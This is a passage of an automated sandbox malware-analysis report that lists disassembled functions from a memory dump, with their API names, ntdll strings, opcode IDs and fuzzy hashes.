                          • Instruction Fuzzy Hash: 6881B070E052499FEF258E6CC8B17FEBBB1EF46360F1A415BE855A73A1C73488418B51
                          Function 01499126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$@
                          • API String ID: 3446177414-1194432280
                          • Opcode ID: b335684746aa1587d2e3f832ee9c42cd2cc06160798c387fd1ad2cf189de08f5
                          • Instruction ID: a12fba294751161e2f86911070e229e519798b26ab5c25db360e361b515c1e86
                          • Opcode Fuzzy Hash: b335684746aa1587d2e3f832ee9c42cd2cc06160798c387fd1ad2cf189de08f5
                          • Instruction Fuzzy Hash: 13811A71D002699BEB318B54CC45BEEBBB8AB18714F0541DFEA19B7250D7709E85CFA0
                          Function 014BDB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                          • API String ID: 3446177414-56086060
                          • Opcode ID: 51a6082ae0548af7d8ec7adb99903c1573fe27fc54b64d9084f3771ba5156a69
                          • Instruction ID: e8a4a6b013098a333959509d93982c27f2292048f6d148408f5e1dfa25b4f0b5
                          • Opcode Fuzzy Hash: 51a6082ae0548af7d8ec7adb99903c1573fe27fc54b64d9084f3771ba5156a69
                          • Instruction Fuzzy Hash: 67415A31A04241DFD722DF68C484BAAB7B4FF10728F1440AFD9055B7B1CB78A885C7A1
                          Function 01514755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • LdrpCheckRedirection, xrefs: 0151488F
                          • minkernel\ntdll\ldrredirect.c, xrefs: 01514899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01514888
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 3446177414-3154609507
                          • Opcode ID: d47fddfaf0e05d788eb4d4a638fd9d502c7d327571a694e592bad9860bfe47b7
                          • Instruction ID: a08107e39b76a02953d2996538a822d977fa56aff9fadadb91fd3ed8a262d47c
                          • Opcode Fuzzy Hash: d47fddfaf0e05d788eb4d4a638fd9d502c7d327571a694e592bad9860bfe47b7
                          • Instruction Fuzzy Hash: D541B372A14251AFEB23CE5CD840A2A7BE4BF89750B091569ED59EF319D730DC01CB91
                          Function 014BDBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                          • API String ID: 3446177414-3526935505
                          • Opcode ID: 4c140e1eb0c4580c0fa8a5590427a22a45201f3923be914ea8645531b8210fc0
                          • Instruction ID: a2418c7d262811082aab9a57b32d21f8660e7176d29be5a0d31969ec36ea52b8
                          • Opcode Fuzzy Hash: 4c140e1eb0c4580c0fa8a5590427a22a45201f3923be914ea8645531b8210fc0
                          • Instruction Fuzzy Hash: 81312931504780DFD722EB6DC449B9ABBE8EF11B18F14409FE8468B772C7B8A885C761
                          Function 0148C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $
                          • API String ID: 3446177414-3993045852
                          • Opcode ID: 06af38fe3e52db860bb53b1b910138318ef65d2234b76c112475c8a4da7a4390
                          • Instruction ID: 5f88e961820c56568a168c6c2640be2e0b92e24fd1e7987f569fc4678a1dbaa7
                          • Opcode Fuzzy Hash: 06af38fe3e52db860bb53b1b910138318ef65d2234b76c112475c8a4da7a4390
                          • Instruction Fuzzy Hash: 68116532D04219EBCF159FA4D84869D7B71FF54761F10851AF82A6B2E0CB315A05DF80
                          Function 014BEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 48be9c90368eb5645b4314dcc624a9582cbf95b306310a10b50dab5e9822ba85
                          • Instruction ID: 7de05db65a7255587095d7ef1b7b42664bfadeec310778c44112773b5b3ddd16
                          • Opcode Fuzzy Hash: 48be9c90368eb5645b4314dcc624a9582cbf95b306310a10b50dab5e9822ba85
                          • Instruction Fuzzy Hash: C3E10271D00608DFCB25CFA9C980AEEBBF1BF58314F14492AE54AA7361D771A845CF20
                          Function 0150EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: b3bdf50ce49f92988ff5e8c8af6d79932ce693bd3f67234504382a3d58580dfa
                          • Instruction ID: 04ca7ae0eb114a1ba3ca8cb59370bd86beaf07d8cfadc79f4e34a97540a04604
                          • Opcode Fuzzy Hash: b3bdf50ce49f92988ff5e8c8af6d79932ce693bd3f67234504382a3d58580dfa
                          • Instruction Fuzzy Hash: B2712671E002199FDF16CFE8C984AEDBBF5BF48714F14442AE915AB294D734A905CBA0
                          Function 0150F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID:
                          • API String ID: 3446177414-0
                          • Opcode ID: ccca0870506671eafea1396a23524ff4ecda12658616e3422751b18d300ecd7f
                          • Instruction ID: 9e86eb9062cbb001c076be58ac7d40b273e4f026fa126ef7f79b99e42da414c0
                          • Opcode Fuzzy Hash: ccca0870506671eafea1396a23524ff4ecda12658616e3422751b18d300ecd7f
                          • Instruction Fuzzy Hash: 39511271E00219AFDF1ACFD8D845ADDBBF1BF88324F18812AE915AB290D7349905CF54
                          Function 014C7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes$BaseInitThreadThunk
                          • String ID:
                          • API String ID: 4281723722-0
                          • Opcode ID: 01ac6a223e540086d7bbec25b9f4a4b0fd684693e1152624ae67ccb4d700d40d
                          • Instruction ID: 8aa350aafefe279b12d8aaee2bbd1f46aabcb2ccc83be9fff0baf73f03a4a29d
                          • Opcode Fuzzy Hash: 01ac6a223e540086d7bbec25b9f4a4b0fd684693e1152624ae67ccb4d700d40d
                          • Instruction Fuzzy Hash: A8314771E00219AFCF21DFA8D884AADBBF1FB58721F11412AE521BB290D7715D00CF54
                          Function 014959C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 61280133409e9932649cacab9906e985792f61c4a0137bba86b36c907b38baa0
                          • Instruction ID: f0592012f3d6afbe0ff249e3a679a6a8ca5b1edca3a1be56d9d5058d2f849862
                          • Opcode Fuzzy Hash: 61280133409e9932649cacab9906e985792f61c4a0137bba86b36c907b38baa0
                          • Instruction Fuzzy Hash: 8B326A70D0026ADFDF22CF68C844BEEBBB1BB18314F1081EAD549AB261D7755A85CF90
                          Function 014D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                          • Instruction ID: 81b9f162f97677ecc3b974e8a146d39a342cf84b7faa74370152fbea739991d6
                          • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                          • Instruction Fuzzy Hash: 4591AE71E0021A9AEF34CF6DC8B1ABFBBA1AF4432AF14455FE955A73E0D73089418B51
                          Function 014AD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Bl$l
                          • API String ID: 3446177414-208461968
                          • Opcode ID: ac5a3a9db94f3220375c55df44de5c9e0c36d9dae118d3175c58f0db38cad2db
                          • Instruction ID: b7ca231814555b9493435eb62475e9d21aba49611637d286707fe4fb3af39564
                          • Opcode Fuzzy Hash: ac5a3a9db94f3220375c55df44de5c9e0c36d9dae118d3175c58f0db38cad2db
                          • Instruction Fuzzy Hash: 62A1F771E003198BEF31DF99C880BAEB7B1BB64304F4640EAD5096B661DB74AE85CF51
                          Function 014D5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                          Download Yara Rule
                          APIs
                          • __startOneArgErrorHandling.LIBCMT ref: 014D5E34
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: ErrorHandling__start
                          • String ID: pow
                          • API String ID: 3213639722-2276729525
                          • Opcode ID: 2f57f312358f5b8a2fa7140e10da81781d1630a7b593856ec5ff5dc85bf5b3c1
                          • Instruction ID: 274980763c74f1fe44cf6ed7344772b1915d38ba7c942c9c973d66d374255cf2
                          • Opcode Fuzzy Hash: 2f57f312358f5b8a2fa7140e10da81781d1630a7b593856ec5ff5dc85bf5b3c1
                          • Instruction Fuzzy Hash: 6951797190820696DF22B72CC93136F2BA4EB42790F15C95FE4E58E3B9DE34C4968B46
                          Function 014C4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID:
                          • String ID: 0$Flst
                          • API String ID: 0-758220159
                          • Opcode ID: eb457a6e20e6b98f1d09149a57166ffcb00c4d6037719d2fa179f4fb165722b3
                          • Instruction ID: f5ed93d6df23ffe8391d9ec7eeb3de4aedbaa489da33eb4f17734c283d25f35c
                          • Opcode Fuzzy Hash: eb457a6e20e6b98f1d09149a57166ffcb00c4d6037719d2fa179f4fb165722b3
                          • Instruction Fuzzy Hash: 40516AB5E002048FDF66DF99D69466EFBF4BF44B14F19802ED0499B2A1E7709946CB80
                          Function 014BD7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON
                          Download Yara Rule
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 014BD959
                            • Part of subcall function 01494859: RtlDebugPrintTimes.NTDLL ref: 014948F7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$
                          • API String ID: 3446177414-233714265
                          • Opcode ID: dfc8d8787aa098d13e3cb6146e3f33ce9ffd10e828ee4fb290f3593f3ae15f3c
                          • Instruction ID: 163c60e3d5be96ab191bc53c644d5c9bbd244801c69182a5967f8a3cbd722a42
                          • Opcode Fuzzy Hash: dfc8d8787aa098d13e3cb6146e3f33ce9ffd10e828ee4fb290f3593f3ae15f3c
                          • Instruction Fuzzy Hash: A651F271E003469FDB25DFA8C4847DEBBB1BF54318F15409EC9256B3A1D770A94ACBA0
                          Function 0150FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $
                          • API String ID: 3446177414-3993045852
                          • Opcode ID: 0e707dee8a97a274df40b88a11ff03c8dff82d3a0c302980215eff0be3793eae
                          • Instruction ID: 30fa28f00f7396aa8a6a2d52a7305df4891777936045d7bfefc219dd640ea563
                          • Opcode Fuzzy Hash: 0e707dee8a97a274df40b88a11ff03c8dff82d3a0c302980215eff0be3793eae
                          • Instruction Fuzzy Hash: AF417EB5A00209AFDB22DF99D840AEEBBB5FF48B04F14001AE914AB391C7719D15DBA0
                          Function 0148DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1936434312.0000000001486000.00000040.00001000.00020000.00000000.sdmp, Offset: 01460000, based on PE: true
                          • Associated: 0000000E.00000002.1936434312.0000000001460000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001467000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001522000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001583000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 0000000E.00000002.1936434312.0000000001589000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_1460000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: 0$0
                          • API String ID: 3446177414-203156872
                          • Opcode ID: 8740a1f1ebc275b1b2e60c0881269205c31ec6932bda2ecbdae84b9bb53e4c25
                          • Instruction ID: 089c63b664173f908530663dcb109af3554921a9f2476ea61e7bbf1eb82554a2
                          • Opcode Fuzzy Hash: 8740a1f1ebc275b1b2e60c0881269205c31ec6932bda2ecbdae84b9bb53e4c25
